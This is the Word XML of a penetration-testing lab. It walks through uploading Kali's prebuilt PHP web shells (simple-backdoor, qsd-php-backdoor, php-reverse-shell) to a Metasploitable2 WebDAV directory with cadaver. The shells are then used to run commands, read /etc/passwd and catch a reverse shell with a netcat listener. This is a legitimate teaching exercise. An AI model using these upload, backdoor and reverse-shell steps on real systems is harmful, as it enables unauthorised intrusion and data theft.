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381" w14:textId="5D3C0CFA" w:rsidR="007436D3" w:rsidRDefault="004009E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09E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab - </w:t>
      </w:r>
      <w:r w:rsidR="00EF1459">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Local</w:t>
      </w:r>
      <w:r w:rsidR="00EF1459" w:rsidRPr="00EF1459">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> File Inclusion </w:t>
      </w:r>
      <w:r w:rsidR="00760466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Using Kali W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 xml:space="preserve">eb </w:t>
      </w:r>
      <w:r w:rsidR="00760466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 xml:space="preserve">hells PHP </w:t>
      </w:r>
      <w:r w:rsidR="00146EEC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>cripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6437D92C" w14:textId="1D46221F" w:rsidR="004009E9" w:rsidRDefault="004009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30539D4" w14:textId="1DD49EFC" w:rsidR="00EF1459" w:rsidRDefault="00DD4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ocal </w:t>
      </w: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ile </w:t>
      </w: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nclusion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 (LFI) is </w:t>
      </w:r>
      <w:r w:rsidR="003A7F36">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">an attack 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that involves uploading malicious files to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server. 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LFI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attacks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 aim to exploit insecure local file upload functions that fail to validate user-supplied/controlled input.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LFI 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typically </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>affects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 PHP web applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AB3AFF" w14:textId="50499C7D" w:rsidR="00EF1459" w:rsidRDefault="00EF1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WebDAV is one such application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2697B344" w14:textId="59F72021" w:rsidR="004009E9" w:rsidRDefault="004009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09E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">WebDAV stands for Web Distributed Authoring and Versioning. The WebDAV protocol provides a framework for users to create, change and move documents on a server, typically a web server or web share. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0D1576" w14:textId="79F1A2EF" w:rsidR="00A4319B" w:rsidRPr="00A4319B" w:rsidRDefault="00A4319B" w:rsidP="00A43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Kali Linux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comes with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 xml:space="preserve">pre-built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PHP Scripts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that can create a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backdoor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in the form of a web shell or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reverse shell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These pre-built scripts are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stored inside /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webshells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/ph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>entester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322D5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these pre-built scripts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without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having to write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>their own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2ED" w:rsidRPr="000722ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>malicious</w:t>
      </w:r>
      <w:r w:rsidR="000722ED" w:rsidRPr="00072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>PHP code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FD3732" w14:textId="77777777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>simple backdoor.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643B3F25" w14:textId="77777777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qsd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-php backdoor web shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21759B80" w14:textId="4FF2614E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>php-reverse-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shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7B208C65" w14:textId="12D3866B" w:rsidR="004009E9" w:rsidRDefault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Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D871C3" w14:textId="1EEB485A" w:rsidR="00A76553" w:rsidRP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One virtual install of Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43435B9E" w14:textId="78E4F934" w:rsidR="00A76553" w:rsidRP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Once virtual install of Metasploitable2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03392652" w14:textId="304B92E0" w:rsid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Ensure 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Both virtual adapters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>set to NAT Network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4E70B8" w14:textId="135DD782" w:rsidR="00A76553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3836F" wp14:editId="41D5F771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C28" w14:textId="532CB561" w:rsidR="00A76553" w:rsidRPr="00A76553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Metasploitable2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 will show you its current IP address once you log on to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type ifconfig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>. Username and password are provided at the terminal window.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB5EE05" w14:textId="4C210F86" w:rsidR="003804C9" w:rsidRPr="00EF1459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For your Kali, open a terminal and use the ifconfig command to find the IP address assigned to your eth0 adapter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CCC3BE" w14:textId="387D51BF" w:rsidR="004D6CD5" w:rsidRDefault="004D6CD5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C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Begin the lab!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18534E6D" w14:textId="5A636310" w:rsidR="00132E54" w:rsidRDefault="00132E54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Exploiting WebDAV using Cadaver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DC3202" w14:textId="45888D68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Cadaver is a utility for dealing with WebDAV systems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the command line. With cadaver, we can connect to the DAV server directly.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his method does not require credentials. Once connected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you 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 ?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terminal prompt to see what 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allowed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DCAE5" w14:textId="246A7216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CD9F1A" wp14:editId="7C1D4E28">
            <wp:extent cx="59436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7310" w14:textId="43FE2141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access to the WebDAV directory,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can upload web shells to the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server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F98FF04" w14:textId="1FF7C50E" w:rsidR="008C3BD7" w:rsidRPr="008C3BD7" w:rsidRDefault="008C3BD7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BD7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kali Linux web shells PHP scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FD97B7" w14:textId="1FEC67F9" w:rsidR="00760466" w:rsidRDefault="004D6CD5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Kali Linux has </w:t>
      </w:r>
      <w:r w:rsidR="00A066E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pre-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>built web shells PHP scripts</w:t>
      </w:r>
      <w:r w:rsidR="008C3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>stored inside /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D6CD5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4D6CD5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4D6CD5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>webshells</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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/php. </w:t>
      </w:r>
      <w:r w:rsidR="008C3BD7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 can use these scripts without the need of having to write PHP code for a malicious script. Web shells are scripts coded in different languages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 including PHP, Python, ASP, and Perl.  These can be used as a backdoor for illegitimate access to any server by uploading onto a web server running PHP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E984EA3" w14:textId="34F18AF0" w:rsidR="00A76553" w:rsidRDefault="0033793A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your Kali desktop, open a terminal</w:t>
      </w:r>
      <w:r w:rsidR="0073658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type the following command at the prompt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2E54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="00132E54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="00132E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07FF97" w14:textId="07C19732" w:rsidR="00A76553" w:rsidRDefault="00132E54">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00132E54">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ls -al /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00132E54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132E54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132E54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132E54">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F98FF2A" w14:textId="7079034A" w:rsidR="00F435A9" w:rsidRPr="003804C9" w:rsidRDefault="00132E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EC10C8" wp14:editId="1E80FF9A">
            <wp:extent cx="594360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211" w14:textId="2BC1A9BA" w:rsidR="0073658B" w:rsidRDefault="007365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658B"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 the simple-backdoor script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524AEAF3" w14:textId="6DCA31DF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 xml:space="preserve">At the cadaver prompt,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 the following command to upload the </w:t>
      </w:r>
      <w:r w:rsidRPr="00F435A9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>simple-backdoor.php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 to the webserver. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF3B9FA" w14:textId="73AD4767" w:rsidR="00F435A9" w:rsidRPr="00F435A9" w:rsidRDefault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F435A9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F435A9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/php/simple-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6D2575E8" w14:textId="2368BD33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838E3B" wp14:editId="476D1A82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1038" w14:textId="6181D8CD" w:rsidR="00F435A9" w:rsidRDefault="00F435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 the script using a web browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6708AA" w14:textId="38975429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>On your Kali machine, open a web browser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, and in the address bar, type the IP address of your Metasploitable2 target followed by:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BD101C" w14:textId="2BFB9C46" w:rsidR="00F435A9" w:rsidRPr="00F435A9" w:rsidRDefault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/dav/simple-backdoor.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477831C7" w14:textId="77777777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address is: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5E9790" w14:textId="27B48C74" w:rsidR="00F435A9" w:rsidRDefault="00F435A9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10.0.2.5/dav/simple-backdoor.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547D059F" w14:textId="606B97AB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Pr="00F435A9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F435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A677E1" w14:textId="554572A5" w:rsidR="00F435A9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B4CDC7" wp14:editId="0AC57C7D">
            <wp:extent cx="59436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18C6" w14:textId="22C9942B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script is now ready to issue commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783C6ABF" w14:textId="57464864" w:rsidR="00F1758B" w:rsidRDefault="00F1758B" w:rsidP="00F435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2979E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the following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979E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the address to see what access you have.</w:t>
      </w:r>
      <w:r w:rsidR="00EC1100" w:rsidRPr="00EC110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B011878" w14:textId="42ECFD48" w:rsidR="00F1758B" w:rsidRPr="00F1758B" w:rsidRDefault="00F1758B" w:rsidP="00F435A9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F1758B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>?cmd=id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E77FD6A" w14:textId="377E02C1" w:rsidR="002979E8" w:rsidRDefault="00EC1100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CB370" wp14:editId="057B824A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2021" w14:textId="3E53FF97" w:rsidR="002979E8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now use the following command to show the users and passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378126D6" w14:textId="4AC3EE98" w:rsidR="00F1758B" w:rsidRPr="00F1758B" w:rsidRDefault="00F1758B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F1758B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F1758B"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F1758B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=cat+/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F1758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F1758B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C66783" w14:textId="77777777" w:rsidR="00F1758B" w:rsidRDefault="00F1758B" w:rsidP="00F435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DA566" w14:textId="1613254D" w:rsidR="002979E8" w:rsidRPr="00F435A9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8E1BB" wp14:editId="509C4515">
            <wp:extent cx="593407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7A4D" w14:textId="158822B1" w:rsidR="00F435A9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try a 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upload the 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php-backdoor.php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22A7A3AA" w14:textId="15E706A3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cadaver prompt, type the following. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46721CE5" w14:textId="15281EA2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php/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3F2BEA98" w14:textId="404CC36B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F1B1D72" wp14:editId="1715F460">
            <wp:extent cx="5943600" cy="64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0B8" w14:textId="12D450F8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In the address bar of your Kali browser, type the following. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76330193" w14:textId="2164D100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sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>10.0.2.15/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007E5F67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>dav</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007E5F67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/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33B2C33E" w14:textId="0990FE05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This script provides a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more authentic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web shell feel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728873F8" w14:textId="4FA1DCFB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76F3D" wp14:editId="6CFCB1BD">
            <wp:extent cx="5943600" cy="307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4B7" w14:textId="567CED7C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execute command text box, type </w:t>
      </w:r>
      <w:r w:rsidRPr="00727B05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ls -al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AF7F7F" w14:textId="262396A3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390BB8" wp14:editId="6839D109">
            <wp:extent cx="5095875" cy="933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084" cy="9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B0E" w14:textId="243F3DC1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776829" w14:textId="40180509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5FB1D" wp14:editId="07B43E47">
            <wp:extent cx="5143500" cy="13578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607" cy="13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48A" w14:textId="0425BCC9" w:rsidR="007E5F67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can upgrade our web shell still further using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00727B05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Pr="00727B05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Pr="00727B05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</w:p>
    <w:p w14:paraId="1CF941FF" w14:textId="1A6DAD9B" w:rsidR="00780098" w:rsidRDefault="00727B05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the cadaver</w:t>
      </w:r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prompt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type the following command to upload the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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0B7228D9" w14:textId="418ABFDA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bookmarkStart w:id="0" w:name="_Hlk99809492"/>
      <w:r w:rsidRPr="007E5F67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php/</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00780098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Pr="00780098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Pr="00780098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534D9705" w14:textId="4542DA21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78009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060652B" wp14:editId="466C3DC6">
            <wp:extent cx="594360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8A9" w14:textId="7CA9D817" w:rsidR="00780098" w:rsidRPr="00F85379" w:rsidRDefault="00780098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 w:rsidR="00F85379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 Kali browser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85379" w:rsidRPr="00F85379">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in the address bar, type the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FD0DC8" w14:textId="43F20C40" w:rsidR="00F85379" w:rsidRDefault="00772BA0" w:rsidP="00780098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidR="00F85379" w:rsidRPr="006E2957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http://10.0.2.5/dav/qsd-php-backdoor.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="50083F3E" w14:textId="5F29B964" w:rsidR="00F85379" w:rsidRDefault="00F85379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Pr="00F85379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F85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BA2491" w14:textId="3F8492EA" w:rsidR="00F85379" w:rsidRPr="00F85379" w:rsidRDefault="00F85379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bottom of the web shell, type in </w:t>
      </w:r>
      <w:r w:rsidRPr="00F85379">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ls -al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>into the text box.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>Press the go button.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30847C5A" w14:textId="7B655FEB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183B7DF" wp14:editId="57F14D27">
            <wp:extent cx="4572000" cy="439346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34" cy="440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B447" w14:textId="63715225" w:rsidR="00F85379" w:rsidRDefault="00F85379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F85379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7FC1ACC" wp14:editId="64679F0A">
            <wp:extent cx="4838700" cy="250774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1" cy="25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220" w14:textId="7BCEB1AE" w:rsidR="00F1758B" w:rsidRPr="00F1758B" w:rsidRDefault="00F1758B" w:rsidP="007800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58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</w:t>
      </w:r>
      <w:r w:rsidR="00A4319B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F17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Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D69477C" w14:textId="46792279" w:rsidR="00A851FB" w:rsidRDefault="00A851FB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We can also create a reverse shell using the </w:t>
      </w:r>
      <w:r w:rsidRPr="00A851FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>php-reverse-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A851FB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will have to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the script with the IP address </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>of our Kali machine and chosen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port number to use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A100054" w14:textId="34F337ED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your kali machine, open a new terminal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at the prompt, type the following.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A75CE21" w14:textId="251A2C1B" w:rsidR="00584960" w:rsidRDefault="00584960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sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nano 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/php/php-reverse-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</w:p>
    <w:p w14:paraId="781AE0BF" w14:textId="49D0ABF0" w:rsidR="00584960" w:rsidRP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960">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Scroll down until you come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following section of the script. Type in the IP address of your Kali machine. Change the port number to one that is available.</w:t>
      </w:r>
      <w:r w:rsidRPr="005849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374CF7" w14:textId="6560FD96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3809B3" wp14:editId="639CE614">
            <wp:extent cx="5943600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56CE" w14:textId="069D798D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the changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624CCC18" w14:textId="7E565C28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the script to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target server. At the cadaver prompt, type the following.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C82072" w14:textId="55D614B8" w:rsidR="00727B05" w:rsidRDefault="00584960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/php/php-reverse-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</w:p>
    <w:p w14:paraId="10E5BEB3" w14:textId="64ACC0B1" w:rsidR="00584960" w:rsidRDefault="00584960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F58B658" wp14:editId="6717DA49">
            <wp:extent cx="5219700" cy="576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6816" cy="5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A8E" w14:textId="59BDE81F" w:rsidR="00584960" w:rsidRDefault="00584960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960">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Open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4960">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>new terminal on your kali machine.</w:t>
      </w:r>
      <w:r w:rsidR="00B66767">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Start a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B66767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="00B66767">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> listener using port 5555.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657ED0EA" w14:textId="2E6EC8E3" w:rsidR="00B66767" w:rsidRDefault="00B66767" w:rsidP="00F435A9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netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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lvp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 5555</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1D72F8" w14:textId="0883E1E1" w:rsidR="00B66767" w:rsidRP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sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Press enter and leave the terminal open.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169898C5" w14:textId="41A180D3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83EDE" wp14:editId="6B5CCBE3">
            <wp:extent cx="2762250" cy="1095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919" cy="11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FB" w14:textId="38348BA7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your Kali browser and launch the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B66767">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>php-reverse-</w:t>
      </w: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52DE5398" w14:textId="797BD0EA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A2791" wp14:editId="60A16747">
            <wp:extent cx="5153025" cy="597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906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B125" w14:textId="3AB55ACA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target connects to your Kali using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listener. At the prompt, type </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790FE082" w14:textId="5873739E" w:rsidR="00B66767" w:rsidRPr="00B66767" w:rsidRDefault="00B667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70320ED" wp14:editId="60AC403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4981575" cy="302450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28" cy="303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ls -al. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D80B1B0" w14:textId="0ACC8F5D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4410F85F" w14:textId="5A1528BB" w:rsidR="003804C9" w:rsidRDefault="003804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86E10" w14:textId="7E20DF37" w:rsidR="003804C9" w:rsidRPr="003804C9" w:rsidRDefault="003804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4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Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E204BE6" w14:textId="4604AA6D" w:rsidR="003804C9" w:rsidRDefault="003804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short lab, we explored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 and performed numerous ways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establish a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web shell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ready-made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php web shells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scripts inside Kali.</w:t>
      </w:r>
      <w:r w:rsidR="00777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1C5170" w14:textId="68669FE5" w:rsidR="00132E54" w:rsidRPr="00F435A9" w:rsidRDefault="00C41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of the lab!</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00132E54" w:rsidRPr="00F435A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6ED5" w14:textId="77777777" w:rsidR="00772BA0" w:rsidRDefault="00772BA0" w:rsidP="009466E9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7F3100B0" w14:textId="77777777" w:rsidR="00772BA0" w:rsidRDefault="00772BA0" w:rsidP="0094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066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DA0EF" w14:textId="3BB8B9CA" w:rsidR="009466E9" w:rsidRDefault="00946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A3EA2" w14:textId="77777777" w:rsidR="009466E9" w:rsidRDefault="00946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B6C0" w14:textId="77777777" w:rsidR="00772BA0" w:rsidRDefault="00772BA0" w:rsidP="009466E9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4AFD8117" w14:textId="77777777" w:rsidR="00772BA0" w:rsidRDefault="00772BA0" w:rsidP="0094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E1D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C6C29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3F84"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FD4A90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9"/>
    <w:rsid w:val="000722ED"/>
    <w:rsid w:val="000A4E31"/>
    <w:rsid w:val="00132E54"/>
    <w:rsid w:val="00146EEC"/>
    <w:rsid w:val="002979E8"/>
    <w:rsid w:val="00322D54"/>
    <w:rsid w:val="0033793A"/>
    <w:rsid w:val="003804C9"/>
    <w:rsid w:val="003A7F36"/>
    <w:rsid w:val="004009E9"/>
    <w:rsid w:val="004D6CD5"/>
    <w:rsid w:val="00584960"/>
    <w:rsid w:val="00727B05"/>
    <w:rsid w:val="0073658B"/>
    <w:rsid w:val="007436D3"/>
    <w:rsid w:val="00760466"/>
    <w:rsid w:val="00772BA0"/>
    <w:rsid w:val="00777442"/>
    <w:rsid w:val="00780098"/>
    <w:rsid w:val="007E5F67"/>
    <w:rsid w:val="008C3BD7"/>
    <w:rsid w:val="009466E9"/>
    <w:rsid w:val="00A066E9"/>
    <w:rsid w:val="00A4319B"/>
    <w:rsid w:val="00A76553"/>
    <w:rsid w:val="00A851FB"/>
    <w:rsid w:val="00AC50AF"/>
    <w:rsid w:val="00B34C6D"/>
    <w:rsid w:val="00B66767"/>
    <w:rsid w:val="00C413D5"/>
    <w:rsid w:val="00DD481C"/>
    <w:rsid w:val="00EC1100"/>
